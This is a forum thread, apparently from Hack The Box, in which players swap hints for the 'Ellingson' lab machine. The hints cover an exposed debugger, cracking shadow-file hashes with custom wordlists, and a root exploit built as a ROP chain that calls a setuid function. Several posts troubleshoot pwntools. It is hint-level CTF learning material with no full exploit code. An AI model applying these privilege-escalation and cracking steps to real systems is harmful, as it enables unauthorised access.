Ellingson

Jejejeje, yes It makes all sense, i’ll try as you say. When after some hard sweat i get It working, i admit, i was so Happy jumping around that didn’t notice that… Thanks for your advice, and sorry to anyone that follow my not-completely-right answer, sorry

Type your comment> @v01t4ic said:

Type your comment> @rulzgz said:

Type your comment> @r1cin said:

 Can anyone DM me on root? I'm testing my exploit locally, it's running well but I'm not getting root - only normal user.

You need an extra step in your chain, if you have popped the Shell as regular user It should be trivial to add this extra call, just before invoking the Shell you need to explicitly set the user id you want.

Just look man for this c function to locate its signature, pop the arguments, call this function in second step ( instead Shell call) return to main again and this time the Shell call and you’ll get your privileged shell

You don’t need to return to main second time, just do both on the same payload

This is one of my first forays into messing with binary exploits without a guide, and my first time using pwntools. I’m having an issue with it while trying to follow along with some other tutorials where recvuntil just hangs. I’ve heard talks of it being an issue with glibc buffering, but I haven’t found a way around it. I’m hoping someone can point me in a good direction, because I’m fairly lost.

Thanks!

Hi. Can anyone confirm about file permission of shadow file, is it readable by user h**?

Edit: I was reading the wrong file.

Hey. To get a low shell, you need to brute the private key? Who brutes what? Give a hint. thank

Type your comment> @c0mstr3am said:

Hey. To get a low shell, you need to brute the private key? Who brutes what? Give a hint. thank

No need to bruteforce any private key, in next steps you will need to bf some hashes but not with any ssh private_key.

Btw keys are involved in getting remote access to the server, but not that way

Type your comment> @wizliz said:

This is one of my first forays into messing with binary exploits without a guide, and my first time using pwntools. I’m having an issue with it while trying to follow along with some other tutorials where recvuntil just hangs. I’ve heard talks of it being an issue with glibc buffering, but I haven’t found a way around it. I’m hoping someone can point me in a good direction, because I’m fairly lost.

Thanks!

@wizliz
Not sure if it is the same, but i had some issues with recvuntil() when testing the binary locally.
Playing with process() parameters worked for me, try stdin=PTY or shell=True as second parameter when you open the binary with process() that fixed my issues.

Type your comment> @rulzgz said:

Type your comment> @wizliz said:

This is one of my first forays into messing with binary exploits without a guide, and my first time using pwntools. I’m having an issue with it while trying to follow along with some other tutorials where recvuntil just hangs. I’ve heard talks of it being an issue with glibc buffering, but I haven’t found a way around it. I’m hoping someone can point me in a good direction, because I’m fairly lost.

Thanks!

@wizliz
Not sure if it is the same, but i had some issues with recvuntil() when testing the binary locally.
Playing with process() parameters worked for me, try stdin=PTY or shell=True as second parameter when you open the binary with process() that fixed my issues.

Thanks! I actually figured it out and got past that part a few days ago. I’ve got an exploit working on my Kali box locally, but not remotely. I’ve put up an Ubuntu box with a similar config to the target (where necessary, at least), and am trying to get the exploit to pop off there.

I think I’m going to eventually get it. Being new to this is a mix of frustration and fun.

Type your comment> @wizliz said:

  @wizliz 

Thanks! I actually figured it out and got past that part a few days ago. I’ve got an exploit working on my Kali box locally, but not remotely. I’ve put up an Ubuntu box with a similar config to the target (where necessary, at least), and am trying to get the exploit to pop off there.

I’m not sure who suggested this, but VM is absolutely unnecessary step.
Just learn how to use libc and executable over ssh connection from the box. Just 2 lines of code.
If you will search htb forums you might find almost working solution in a different thread.
You can even setup ssh on kali to act as a remote box for your experiments

PS. This was my first binexp, nothing really hard here

Anyone having issues with this box? I’m not able to see much after accessing the IP via browser… I was looking for some code execution, reverse shell… I’ve reset the machine 3x… currently in off mode at this point…

EDIT: I figured it out…

Type your comment> @v01t4ic said:

Type your comment> @wizliz said:

  @wizliz 

Thanks! I actually figured it out and got past that part a few days ago. I’ve got an exploit working on my Kali box locally, but not remotely. I’ve put up an Ubuntu box with a similar config to the target (where necessary, at least), and am trying to get the exploit to pop off there.

I’m not sure who suggested this, but VM is absolutely unnecessary step.
Just learn how to use libc and executable over ssh connection from the box. Just 2 lines of code.
If you will search htb forums you might find almost working solution in a different thread.
You can even setup ssh on kali to act as a remote box for your experiments

PS. This was my first binexp, nothing really hard here

I’m glad it was easy for you. Unfortunately, that doesn’t mean it’s “easy” for everyone else. While setting up a VM might be “unnecessary,” it certainly doesn’t hurt to be able to see what exactly is going on.

Consider in the future that people have vastly different skill levels across the board. Binary Exploitation at this point is way over my head. I’m learning, slowly, but it can get very frustrating and is far from “easy” to me and many others.

Type your comment> @wizliz said:

I’m glad it was easy for you. Unfortunately, that doesn’t mean it’s “easy” for everyone else. While setting up a VM might be “unnecessary,” it certainly doesn’t hurt to be able to see what exactly is going on.

Consider in the future that people have vastly different skill levels across the board. Binary Exploitation at this point is way over my head. I’m learning, slowly, but it can get very frustrating and is far from “easy” to me and many others.

no hard feelings, i’m actually trying to help and make it easier. pretty sure it is much faster to learn how to work over ssh than to setup a VM
whatever way you choose, feel free to pm for a nudge or help.

Woooo!! 6/5, best machine so far, shoutout to @Ic3M4n for such a fun box. Nothing feels forced and yet every step is a helpful learning experience. Really for advanced peeps, but plenty of hints and cookie crumbs in this thread and on the machine to introduce new concepts. A healthy knowledge of python will help, as well as learning about ROP and using gadgets to chain functions. Everything you need should be in the first 7-8 pages, but here are my condensed tips for Ellingson

FOOTHOLD:
Enumeration is quick and easy and is perfect example of why always checking to make sure all debuggers are turned off before migrating your app to a production server is a good idea.

USER:
You will need to think like OSCP and “Try Harder” because a rev shell won’t work so think of ways to enumerate the machine without one. When enumerating, don’t be afraid of your own shadow especially when you’re backing up ;). If you find some hash browns, you’ll want to go back to your website enumeration and look for a page with password hints, play it cewl with these hints and make your own wordlist, or combine the passwords with the relevant words from leaked password lists into one wordlist. Once you crack the eggs over your hash browns, you’ll get the correct user if you wait long enough and get most (3/4?) of the cracked eggs. Everything else is a red herring.

ROOT:
Do the usual nix priv esc recon and you should find something that stands out. You’ll need to write your own exploit for this bn. The video from ippsec is a God send. Stage1 is verbatim, stage2 is almost the same except that you’ll need to call the special s**d function yourself (Thanks @opt1kz !) For this you’ll need to build your own rop chain and remember when building your chain, that the argument to the function should go before the function.

GL!

PS> Yes, its possible to write your own exploit without using the python library discussed in ippsec’s vid and on this thread (p*****ls). The builtin libs I used were struct, subprocess, os, signal. It was pretty difficult though, so I wouldn’t recommend it unless you really want to learn about how python handles I/O.

Rooted :slight_smile: Great box. I wonder how to do this with automated way using ELF on remote. I was looking in docs but i cant find the answer. Anyone knows solution?

Going for root. Having a problem with pw*****s recv() to get the leak. I’m getting a malformed address, that I can’t convert whatever I try. Has anybody had this issue? I’d very much appreciate a PM, because I feel like I’ve hit a brick wall and can’t move forward.

I am getting close to root, but I keep getting the following error while attempting to run the second phase of the exploit, Got EOF while reading in interactive Could someone please give me a nudge?

User wasn’t too bad. Basic web enum will get you your shell. From here just run your basic privesc scripts, you will find some hashes that will lead ya to user.txt. Onto learning ROP chains!!

That was a really cool box! User was easy, root had a bit of a learning curve but once I understood what was needed it all fell into place. There are more than enough hints already in this forum that you shouldn’t need to pm anyone. However, if you don’t understand how a particular step works I would be happy to explain my limited knowledge to you or at least direct you to the proper google page :smiley:

Hello to all. Why is my Python not correctly converting addressing in memory? How to deal with this?

p64(0x404028)
‘(@@\x00\x00\x00\x00\x00’

p64(0x40179B)
‘\x9b\x17@\x00\x00\x00\x00\x00’

@redshift said:
Going for root. Having a problem with pw*****s recv() to get the leak. I’m getting a malformed address, that I can’t convert whatever I try. Has anybody had this issue? I’d very much appreciate a PM, because I feel like I’ve hit a brick wall and can’t move forward.

+1 the same problem with converting addresses

Finally rooted thanks to @AzAxIaL

If anyone wants help with root, please message me via Discord.
There are good hints in these forums to get user.